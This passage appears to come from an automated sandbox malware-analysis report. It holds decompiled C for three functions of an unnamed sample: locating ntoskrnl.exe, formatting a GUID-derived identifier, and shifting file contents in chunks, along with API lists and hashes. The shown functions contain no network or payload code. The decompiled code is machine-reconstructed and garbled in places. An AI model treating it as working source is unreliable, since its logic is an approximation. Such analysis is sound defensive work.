                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2304957937-0
                                                                                                                                                                                          • Opcode ID: f430944877d54a100437ffd1b156c8d1bf7ae20e9ef11e252860605b69e85e76
                                                                                                                                                                                          • Instruction ID: 1035015e6ce99c645a1badef273734037e0d2a990296bca347e9e6a9d34501d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f430944877d54a100437ffd1b156c8d1bf7ae20e9ef11e252860605b69e85e76
                                                                                                                                                                                          • Instruction Fuzzy Hash: D201D232348718A7DBE15BADFC08FBA3669AB84B55F150120F751D6394CBA0CC4086B7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F450 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00C8F450(void* __ebx, void* __edi, WCHAR* __esi, void* __eflags) {
				signed int _v4;
				signed int _v12;
				signed int _v20;
				void* _v524;
				short _v532;
				signed int _t9;
				void* _t12;
				void* _t32;
				signed int _t36;
				signed int _t37;

				_t34 = __edi;
				_t36 =  &_v524;
				_t9 =  *0xd64070; // 0x8a9e1774
				_v4 = _t9 ^ _t36;
				_t12 = E00D006A0(__edi,  &_v524, 0, 0x208);
				_t37 = _t36 + 0xc;
				__imp__GetSystemWindowsDirectoryW( &_v524, 0x104);
				if(_t12 - 1 > 0x102) {
					return E00D0071A(0x80004005, __ebx, _v12 ^ _t37, _t32, _t34, __esi);
				} else {
					if(E00C8F400() != 0) {
						PathCombineW(__esi,  &_v532, L"SysNative\\ntoskrnl.exe");
						return E00D0071A(0, __ebx, _v20 ^ _t37, _t32, _t34, __esi);
					} else {
						PathCombineW(__esi,  &_v532, L"System32\\ntoskrnl.exe");
						return E00D0071A(0, __ebx, _v20 ^ _t37,  &_v532, _t34, __esi);
					}
				}
			}













                                                                                                                                                                                          0x00c8f450
                                                                                                                                                                                          0x00c8f450
                                                                                                                                                                                          0x00c8f456
                                                                                                                                                                                          0x00c8f45d
                                                                                                                                                                                          0x00c8f470
                                                                                                                                                                                          0x00c8f475
                                                                                                                                                                                          0x00c8f482
                                                                                                                                                                                          0x00c8f48e
                                                                                                                                                                                          0x00c8f502
                                                                                                                                                                                          0x00c8f490
                                                                                                                                                                                          0x00c8f497
                                                                                                                                                                                          0x00c8f4cc
                                                                                                                                                                                          0x00c8f4e8
                                                                                                                                                                                          0x00c8f499
                                                                                                                                                                                          0x00c8f4a4
                                                                                                                                                                                          0x00c8f4c0
                                                                                                                                                                                          0x00c8f4c0
                                                                                                                                                                                          0x00c8f497

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8F470
                                                                                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32 ref: 00C8F482
                                                                                                                                                                                            • Part of subcall function 00C8F400: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C8F495), ref: 00C8F40C
                                                                                                                                                                                            • Part of subcall function 00C8F400: GetProcAddress.KERNEL32(00000000), ref: 00C8F413
                                                                                                                                                                                            • Part of subcall function 00C8F400: GetCurrentProcess.KERNEL32(00C8F495,?,00C8F495), ref: 00C8F42A
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,System32\ntoskrnl.exe), ref: 00C8F4A4
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,SysNative\ntoskrnl.exe), ref: 00C8F4CC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CombinePath$AddressCurrentDirectoryHandleModuleProcProcessSystemWindows_memset
                                                                                                                                                                                          • String ID: SysNative\ntoskrnl.exe$System32\ntoskrnl.exe
                                                                                                                                                                                          • API String ID: 3000881479-3236087421
                                                                                                                                                                                          • Opcode ID: 386c55d6ef99c65da313a8efe41a5a3310c11b66ca3ede6e200b2030afc90339
                                                                                                                                                                                          • Instruction ID: 96030863faf9b435e07dc88f697fd6ca4154a6d38893ed5fa1d9ebaf33a54622
                                                                                                                                                                                          • Opcode Fuzzy Hash: 386c55d6ef99c65da313a8efe41a5a3310c11b66ca3ede6e200b2030afc90339
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C0180B06003406BD764EB34984ABAF73D5EBC8700F804A19B5ADC61D2EE7899089A67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C90450 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 198COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E00C90450(intOrPtr* __ecx, void* __eflags, WCHAR** _a4, signed int _a8) {
				char _v4;
				char _v12;
				char _v20;
				char _v24;
				signed int _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed char _t79;
				WCHAR* _t82;
				intOrPtr* _t92;
				intOrPtr* _t94;
				signed int _t100;
				void* _t102;
				signed int** _t105;
				intOrPtr* _t107;
				void* _t121;
				char _t122;
				signed int _t133;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t160;
				signed int _t162;
				void* _t169;
				intOrPtr* _t170;
				void* _t176;
				signed int _t180;
				void* _t183;
				WCHAR** _t184;
				void* _t186;
				signed int _t187;

				_t187 = _t186 - 0x14;
				_t71 =  *0xd64070; // 0x8a9e1774
				 *[fs:0x0] =  &_v12;
				_t184 = _a4;
				_t170 = __ecx;
				_t152 =  *0xd68c98; // 0xd46f14
				_v28 =  *((intOrPtr*)(__ecx + 0xc));
				_t5 = _t152 + 0xc; // 0xd2f706
				_v20 = 0;
				_v32 =  *((intOrPtr*)( *_t5))(_t71 ^ _t187, _t169, _t176, _t183, _t121,  *[fs:0x0], 0xd39110, 0xffffffff) + 0x10;
				_v4 = 0;
				_t178 = _t184;
				E00C91070(_t184);
				_t79 =  *(_t170 + 0xc);
				if((_t79 & 0x00000003) != 0) {
					__eflags = _t79 & 0x00000001;
					if((_t79 & 0x00000001) != 0) {
						E00C90C60(_t121,  *((intOrPtr*)( *_t170 - 0xc)), _t178, _t184,  &_v32,  *_t170);
					}
					__eflags =  *(_t170 + 0xc) & 0x00000002;
					if(( *(_t170 + 0xc) & 0x00000002) != 0) {
						E00C90C60(_t121,  *((intOrPtr*)( *((intOrPtr*)(_t170 + 4)) - 0xc)), _t178, _t184,  &_v32,  *((intOrPtr*)(_t170 + 4)));
					}
					__eflags =  *(_t170 + 0xc) & 0x00000008;
					if(__eflags != 0) {
						E00C90C60(_t121,  *((intOrPtr*)(_t170 - 0xc)), _t178, _t184,  &_v32, _t170);
					}
					_push( *((intOrPtr*)(_v32 - 0xc)));
					E00C8FC80(_t121, _v32, _t184, _t170, __eflags);
					_t187 = _t187 + 4;
					_t32 =  &_v28;
					 *_t32 = _v28 | 0x00000020;
					__eflags =  *_t32;
					_t122 = 1;
				} else {
					if(E00C902D0(_t184, _t184) != 0) {
						_v28 = 0x10;
					}
					_t122 = 1;
					_v20 = 1;
				}
				_t82 =  *_t184;
				_t131 =  *((intOrPtr*)(_t82 - 0xc));
				if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
					__eflags = _a8;
					if(_a8 == 0) {
						_t100 = StrCmpNIW(_t82, L"ffffffff", 8);
						__eflags = _t100;
						if(_t100 != 0) {
							E00C90F70(_t184,  &_v24);
							_t160 =  &_v32;
							_v12 = _t122;
							_t102 = E00C90F90(_t184, _t160);
							_t187 = _t187 + 4;
							_v12 = 2;
							E00C91440(_t102, _t184);
							_v12 = _t122;
							_t105 = _v32 + 0xfffffff0;
							asm("lock xadd [ecx], edx");
							_t162 = (_t160 | 0xffffffff) - 1;
							__eflags = _t162;
							if(_t162 <= 0) {
								_t162 =  *( *_t105);
								 *((intOrPtr*)( *((intOrPtr*)(_t162 + 4))))(_t105);
							}
							_v12 = 0;
							_t107 = _v24 + 0xfffffff0;
							asm("lock xadd [ecx], edx");
							__eflags = (_t162 | 0xffffffff) - 1;
							if((_t162 | 0xffffffff) - 1 <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t107)) + 4))))(_t107);
							}
						}
					}
				} else {
					E00C91990(_t184, _t131 + 0x28, _t131, _t170, _t178, _t184, L"0000000000000000000000000000000000000000");
					_v24 = 1;
				}
				_t154 =  *0xd68c98; // 0xd46f14
				_t50 = _t154 + 0xc; // 0xd2f706
				_v24 =  *((intOrPtr*)( *_t50))() + 0x10;
				_v4 = 3;
				E00C90BB0( &_v24,  *_t184);
				E00C92110("%02x", _v28 & 0x000000ff);
				_t133 = E00C8FED0(_v24,  *((intOrPtr*)(_v24 - 0xc))) & 0x000000ff;
				_push(_t133);
				E00C92120(L"%02x%02x", _v28 & 0x000000ff);
				_v4 = 0;
				_t92 = _v24 + 0xfffffff0;
				asm("lock xadd [edx], ecx");
				if((_t133 | 0xffffffff) - 1 <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t92)) + 4))))(_t92);
				}
				_v4 = 0xffffffff;
				_t94 = _v32 + 0xfffffff0;
				_t180 = 0 | _v20 == 0x00000000;
				asm("lock xadd [edx], ecx");
				if(0xfffffffffffffffe <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t94)) + 4))))(_t94);
				}
				 *[fs:0x0] = _v12;
				return _t180;
			}





































                                                                                                                                                                                          0x00c9045e
                                                                                                                                                                                          0x00c90465
                                                                                                                                                                                          0x00c90471
                                                                                                                                                                                          0x00c90477
                                                                                                                                                                                          0x00c9047b
                                                                                                                                                                                          0x00c90480
                                                                                                                                                                                          0x00c90486
                                                                                                                                                                                          0x00c9048a
                                                                                                                                                                                          0x00c90494
                                                                                                                                                                                          0x00c9049d
                                                                                                                                                                                          0x00c904a1
                                                                                                                                                                                          0x00c904a5
                                                                                                                                                                                          0x00c904a7
                                                                                                                                                                                          0x00c904ac
                                                                                                                                                                                          0x00c904b1
                                                                                                                                                                                          0x00c904d1
                                                                                                                                                                                          0x00c904d3
                                                                                                                                                                                          0x00c904e0
                                                                                                                                                                                          0x00c904e0
                                                                                                                                                                                          0x00c904e5
                                                                                                                                                                                          0x00c904e9
                                                                                                                                                                                          0x00c904f7
                                                                                                                                                                                          0x00c904f7
                                                                                                                                                                                          0x00c904fc
                                                                                                                                                                                          0x00c90500
                                                                                                                                                                                          0x00c9050e
                                                                                                                                                                                          0x00c9050e
                                                                                                                                                                                          0x00c9051a
                                                                                                                                                                                          0x00c9051d
                                                                                                                                                                                          0x00c90522
                                                                                                                                                                                          0x00c90525
                                                                                                                                                                                          0x00c90525
                                                                                                                                                                                          0x00c90525
                                                                                                                                                                                          0x00c9052a
                                                                                                                                                                                          0x00c904b3
                                                                                                                                                                                          0x00c904bc
                                                                                                                                                                                          0x00c904be
                                                                                                                                                                                          0x00c904be
                                                                                                                                                                                          0x00c904c6
                                                                                                                                                                                          0x00c904cb
                                                                                                                                                                                          0x00c904cb
                                                                                                                                                                                          0x00c9052f
                                                                                                                                                                                          0x00c90532
                                                                                                                                                                                          0x00c90537
                                                                                                                                                                                          0x00c90555
                                                                                                                                                                                          0x00c9055a
                                                                                                                                                                                          0x00c90568
                                                                                                                                                                                          0x00c9056e
                                                                                                                                                                                          0x00c90570
                                                                                                                                                                                          0x00c90578
                                                                                                                                                                                          0x00c9057d
                                                                                                                                                                                          0x00c90584
                                                                                                                                                                                          0x00c90588
                                                                                                                                                                                          0x00c9058d
                                                                                                                                                                                          0x00c90592
                                                                                                                                                                                          0x00c90597
                                                                                                                                                                                          0x00c9059c
                                                                                                                                                                                          0x00c905a4
                                                                                                                                                                                          0x00c905ad
                                                                                                                                                                                          0x00c905b1
                                                                                                                                                                                          0x00c905b2
                                                                                                                                                                                          0x00c905b4
                                                                                                                                                                                          0x00c905b8
                                                                                                                                                                                          0x00c905be
                                                                                                                                                                                          0x00c905be
                                                                                                                                                                                          0x00c905c0
                                                                                                                                                                                          0x00c905c9
                                                                                                                                                                                          0x00c905d2
                                                                                                                                                                                          0x00c905d7
                                                                                                                                                                                          0x00c905d9
                                                                                                                                                                                          0x00c905e3
                                                                                                                                                                                          0x00c905e3
                                                                                                                                                                                          0x00c905d9
                                                                                                                                                                                          0x00c90570
                                                                                                                                                                                          0x00c90539
                                                                                                                                                                                          0x00c90543
                                                                                                                                                                                          0x00c90548
                                                                                                                                                                                          0x00c90548
                                                                                                                                                                                          0x00c905e5
                                                                                                                                                                                          0x00c905eb
                                                                                                                                                                                          0x00c905f8
                                                                                                                                                                                          0x00c905fc
                                                                                                                                                                                          0x00c90608
                                                                                                                                                                                          0x00c90621
                                                                                                                                                                                          0x00c90632
                                                                                                                                                                                          0x00c90635
                                                                                                                                                                                          0x00c9063e
                                                                                                                                                                                          0x00c90643
                                                                                                                                                                                          0x00c9064c
                                                                                                                                                                                          0x00c90658
                                                                                                                                                                                          0x00c9065f
                                                                                                                                                                                          0x00c90669
                                                                                                                                                                                          0x00c90669
                                                                                                                                                                                          0x00c90671
                                                                                                                                                                                          0x00c90680
                                                                                                                                                                                          0x00c90686
                                                                                                                                                                                          0x00c9068d
                                                                                                                                                                                          0x00c90694
                                                                                                                                                                                          0x00c9069e
                                                                                                                                                                                          0x00c9069e
                                                                                                                                                                                          0x00c906a6
                                                                                                                                                                                          0x00c906b5

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C902D0: CoCreateGuid.OLE32(?,8A9E1774,?,?,00000000,?,00D39078,000000FF,00C904BA,?,00000000), ref: 00C90308
                                                                                                                                                                                          • StrCmpNIW.SHLWAPI(00000000,ffffffff,00000008), ref: 00C90568
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateGuid
                                                                                                                                                                                          • String ID: $%02x$%02x%02x$0000000000000000000000000000000000000000$ffffffff
                                                                                                                                                                                          • API String ID: 2531319410-3886543845
                                                                                                                                                                                          • Opcode ID: 6b4c043073a6e8a4cf514f8468cedb59024f14f362b381388b18b76fd5a8f6d4
                                                                                                                                                                                          • Instruction ID: bae0bf9399e3d541be1aea1d84470337915c43ff77078906b6122391ae3b02e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b4c043073a6e8a4cf514f8468cedb59024f14f362b381388b18b76fd5a8f6d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A715A712047419FD704DF28C889A1AB7E4BF88324F24875CF9A99B3A2DB75E905CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84160 Relevance: 9.2, APIs: 6, Instructions: 157fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E00C84160(intOrPtr _a4, struct _OVERLAPPED* _a8, void* _a12, intOrPtr _a16) {
				union _LARGE_INTEGER _v0;
				void* _v4;
				char _v8;
				union _LARGE_INTEGER* _v12;
				union _LARGE_INTEGER _v16;
				long _v20;
				long _v24;
				signed int _v28;
				signed int _t38;
				int _t41;
				int _t44;
				int _t46;
				int _t50;
				int _t52;
				struct _OVERLAPPED* _t55;
				long _t56;
				long _t58;
				union _LARGE_INTEGER* _t59;
				struct %anon52 _t61;
				signed int _t62;
				signed int _t63;
				union _LARGE_INTEGER* _t73;
				struct _OVERLAPPED* _t74;
				long _t76;
				union _LARGE_INTEGER _t79;
				void* _t84;

				_t59 = _a12;
				_t74 = _a8;
				_t79 = _t74 - _a16;
				_t73 = _t59;
				asm("sbb edi, eax");
				_t84 = _t59 - _t73;
				if(_t84 > 0 || _t84 >= 0 && _t74 >= _t79) {
					__imp__GetFileSizeEx(_a4,  &_v8);
					__eflags = 0;
					if(0 == 0) {
						L26:
						_push(0xd47270);
						_push(0);
						_push(0);
						E00C88150(0xd47270);
						goto L27;
					} else {
						_t38 = _v12;
						_t61 = _v16.LowPart;
						__eflags = _t59 - _t38;
						if(__eflags < 0) {
							L14:
							_t62 = _t61 - _t74;
							asm("sbb eax, ebx");
							_t63 = (_t38 << 0x00000020 | _t62) >> 0xf;
							_t76 = _t62 & 0x00007fff;
							__eflags = _t76;
							_v28 = _t63;
							if(_t76 != 0) {
								_t63 = _t63 + 1;
								__eflags = _t63;
								_v28 = _t63;
							} else {
								_t76 = 0x8000;
							}
							_a8 = 0;
							__eflags = _t63;
							if(_t63 <= 0) {
								L25:
								_t41 = SetEndOfFile(_v4);
								__eflags = _t41;
								if(_t41 != 0) {
									goto L13;
								} else {
									goto L26;
								}
							} else {
								while(1) {
									_push(0);
									_t44 = SetFilePointerEx(_v4, _v0.LowPart, _t59, 0);
									__eflags = _t44;
									if(_t44 == 0) {
										goto L26;
									}
									_t46 = ReadFile(_v4, _a12, _t76,  &_v24, 0);
									__eflags = _t46;
									if(_t46 == 0) {
										goto L26;
									} else {
										__eflags = _t76 - _v24;
										if(_t76 != _v24) {
											goto L3;
										} else {
											_push(0);
											_t50 = SetFilePointerEx(_v4, _t79, _t73, 0);
											__eflags = _t50;
											if(_t50 == 0) {
												goto L26;
											} else {
												_t52 = WriteFile(_v4, _a12, _t76,  &_v20, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													goto L26;
												} else {
													__eflags = _t76 - _v20;
													if(_t76 != _v20) {
														goto L3;
													} else {
														_v0.LowPart = _v0 + _t76;
														asm("adc ebx, eax");
														_t79 = _t79 + _t76;
														asm("adc edi, eax");
														_t55 =  &(_a8->Internal);
														_t76 = 0x8000;
														_a8 = _t55;
														__eflags = _t55 - _v28;
														if(_t55 < _v28) {
															continue;
														} else {
															goto L25;
														}
													}
												}
											}
										}
									}
									goto L28;
								}
								goto L26;
							}
						} else {
							if(__eflags > 0) {
								L8:
								__eflags = _t73 - _t38;
								if(__eflags > 0) {
									L13:
									return 1;
								} else {
									if(__eflags < 0) {
										L11:
										_t77 = _v4;
										_v16 = _t79;
										_v12 = _t73;
										_t56 = E00C83F60(_v4, _t79, _t73);
										__eflags = _t56;
										if(_t56 == 0) {
											L27:
											__eflags = 0;
											return 0;
										} else {
											_t58 = E00C83FA0(_t77);
											__eflags = _t58;
											if(_t58 == 0) {
												goto L27;
											} else {
												goto L13;
											}
										}
									} else {
										__eflags = _t79 - _t61;
										if(_t79 >= _t61) {
											goto L13;
										} else {
											goto L11;
										}
									}
								}
							} else {
								__eflags = _t74 - _t61;
								if(_t74 < _t61) {
									goto L14;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L3:
					E00C88420(1, 0xd47270);
					return 0;
				}
				L28:
			}





























                                                                                                                                                                                          0x00c84164
                                                                                                                                                                                          0x00c8416a
                                                                                                                                                                                          0x00c84172
                                                                                                                                                                                          0x00c84177
                                                                                                                                                                                          0x00c84179
                                                                                                                                                                                          0x00c8417b
                                                                                                                                                                                          0x00c8417d
                                                                                                                                                                                          0x00c841ab
                                                                                                                                                                                          0x00c841b1
                                                                                                                                                                                          0x00c841b3
                                                                                                                                                                                          0x00c842fb
                                                                                                                                                                                          0x00c842fb
                                                                                                                                                                                          0x00c84300
                                                                                                                                                                                          0x00c84302
                                                                                                                                                                                          0x00c84309
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c841b9
                                                                                                                                                                                          0x00c841b9
                                                                                                                                                                                          0x00c841bd
                                                                                                                                                                                          0x00c841c1
                                                                                                                                                                                          0x00c841c3
                                                                                                                                                                                          0x00c84211
                                                                                                                                                                                          0x00c84211
                                                                                                                                                                                          0x00c84213
                                                                                                                                                                                          0x00c84217
                                                                                                                                                                                          0x00c8421e
                                                                                                                                                                                          0x00c8421e
                                                                                                                                                                                          0x00c84224
                                                                                                                                                                                          0x00c84228
                                                                                                                                                                                          0x00c84231
                                                                                                                                                                                          0x00c84231
                                                                                                                                                                                          0x00c84232
                                                                                                                                                                                          0x00c8422a
                                                                                                                                                                                          0x00c8422a
                                                                                                                                                                                          0x00c8422a
                                                                                                                                                                                          0x00c84236
                                                                                                                                                                                          0x00c8423e
                                                                                                                                                                                          0x00c84240
                                                                                                                                                                                          0x00c842e8
                                                                                                                                                                                          0x00c842ed
                                                                                                                                                                                          0x00c842f3
                                                                                                                                                                                          0x00c842f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84246
                                                                                                                                                                                          0x00c84246
                                                                                                                                                                                          0x00c8424e
                                                                                                                                                                                          0x00c84255
                                                                                                                                                                                          0x00c8425b
                                                                                                                                                                                          0x00c8425d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84275
                                                                                                                                                                                          0x00c8427b
                                                                                                                                                                                          0x00c8427d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8427f
                                                                                                                                                                                          0x00c8427f
                                                                                                                                                                                          0x00c84283
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84289
                                                                                                                                                                                          0x00c8428d
                                                                                                                                                                                          0x00c84294
                                                                                                                                                                                          0x00c8429a
                                                                                                                                                                                          0x00c8429c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8429e
                                                                                                                                                                                          0x00c842b0
                                                                                                                                                                                          0x00c842b6
                                                                                                                                                                                          0x00c842b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c842ba
                                                                                                                                                                                          0x00c842ba
                                                                                                                                                                                          0x00c842be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c842c4
                                                                                                                                                                                          0x00c842c6
                                                                                                                                                                                          0x00c842ca
                                                                                                                                                                                          0x00c842cc
                                                                                                                                                                                          0x00c842ce
                                                                                                                                                                                          0x00c842d4
                                                                                                                                                                                          0x00c842d5
                                                                                                                                                                                          0x00c842da
                                                                                                                                                                                          0x00c842de
                                                                                                                                                                                          0x00c842e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c842e2
                                                                                                                                                                                          0x00c842be
                                                                                                                                                                                          0x00c842b8
                                                                                                                                                                                          0x00c8429c
                                                                                                                                                                                          0x00c84283
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8427d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84246
                                                                                                                                                                                          0x00c841c5
                                                                                                                                                                                          0x00c841c5
                                                                                                                                                                                          0x00c841cb
                                                                                                                                                                                          0x00c841cb
                                                                                                                                                                                          0x00c841cd
                                                                                                                                                                                          0x00c84207
                                                                                                                                                                                          0x00c84210
                                                                                                                                                                                          0x00c841cf
                                                                                                                                                                                          0x00c841cf
                                                                                                                                                                                          0x00c841d5
                                                                                                                                                                                          0x00c841d5
                                                                                                                                                                                          0x00c841dd
                                                                                                                                                                                          0x00c841e1
                                                                                                                                                                                          0x00c841e5
                                                                                                                                                                                          0x00c841ed
                                                                                                                                                                                          0x00c841ef
                                                                                                                                                                                          0x00c84314
                                                                                                                                                                                          0x00c84314
                                                                                                                                                                                          0x00c8431a
                                                                                                                                                                                          0x00c841f5
                                                                                                                                                                                          0x00c841f7
                                                                                                                                                                                          0x00c841fc
                                                                                                                                                                                          0x00c841fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c841fe
                                                                                                                                                                                          0x00c841d1
                                                                                                                                                                                          0x00c841d1
                                                                                                                                                                                          0x00c841d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c841d3
                                                                                                                                                                                          0x00c841cf
                                                                                                                                                                                          0x00c841c7
                                                                                                                                                                                          0x00c841c7
                                                                                                                                                                                          0x00c841c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c841c9
                                                                                                                                                                                          0x00c841c5
                                                                                                                                                                                          0x00c841c3
                                                                                                                                                                                          0x00c84185
                                                                                                                                                                                          0x00c84185
                                                                                                                                                                                          0x00c8418f
                                                                                                                                                                                          0x00c841a0
                                                                                                                                                                                          0x00c841a0
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?), ref: 00C841AB
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C84255
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C84275
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C84294
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C842B0
                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?), ref: 00C842ED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
